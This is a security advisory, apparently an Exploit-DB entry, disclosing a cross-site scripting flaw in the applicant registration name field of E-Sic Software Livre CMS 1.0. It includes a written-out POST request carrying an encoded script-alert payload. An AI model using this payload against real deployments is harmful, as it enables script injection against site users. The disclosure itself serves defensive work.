E-Sic Software livre CMS - Cross Site Scripting

vendor:

E-Sic Software Livre

by:

Elber Tavares

7,5

CVSS

HIGH

Cross Site Scripting

CWE

Product Name: E-Sic Software Livre

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:softwarepublico.gov.br:e-sic_software_livre:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux, Windows 7, 8.1, 10 - Firefox

2017

E-Sic Software livre CMS – Cross Site Scripting

The XSS is present in the applicant registration area, where it is possible to inject codes through the input that receives the user's name.

Mitigation:

Input validation, output encoding, and content security policy can be used to mitigate XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting#
Date: 12/10/2017# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-xss.html

O XSS está presente na área de cadastro de solicitante,
onde é possivel injetar códigos pelo input que recebe o nome do usuário

---------------------------------------------------------------------

Url: http://localhost/esic/index/

POST: http://localhost/cadastro/index.php
DATA:
DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
uf=&numero=&complemento=&acao=Salvar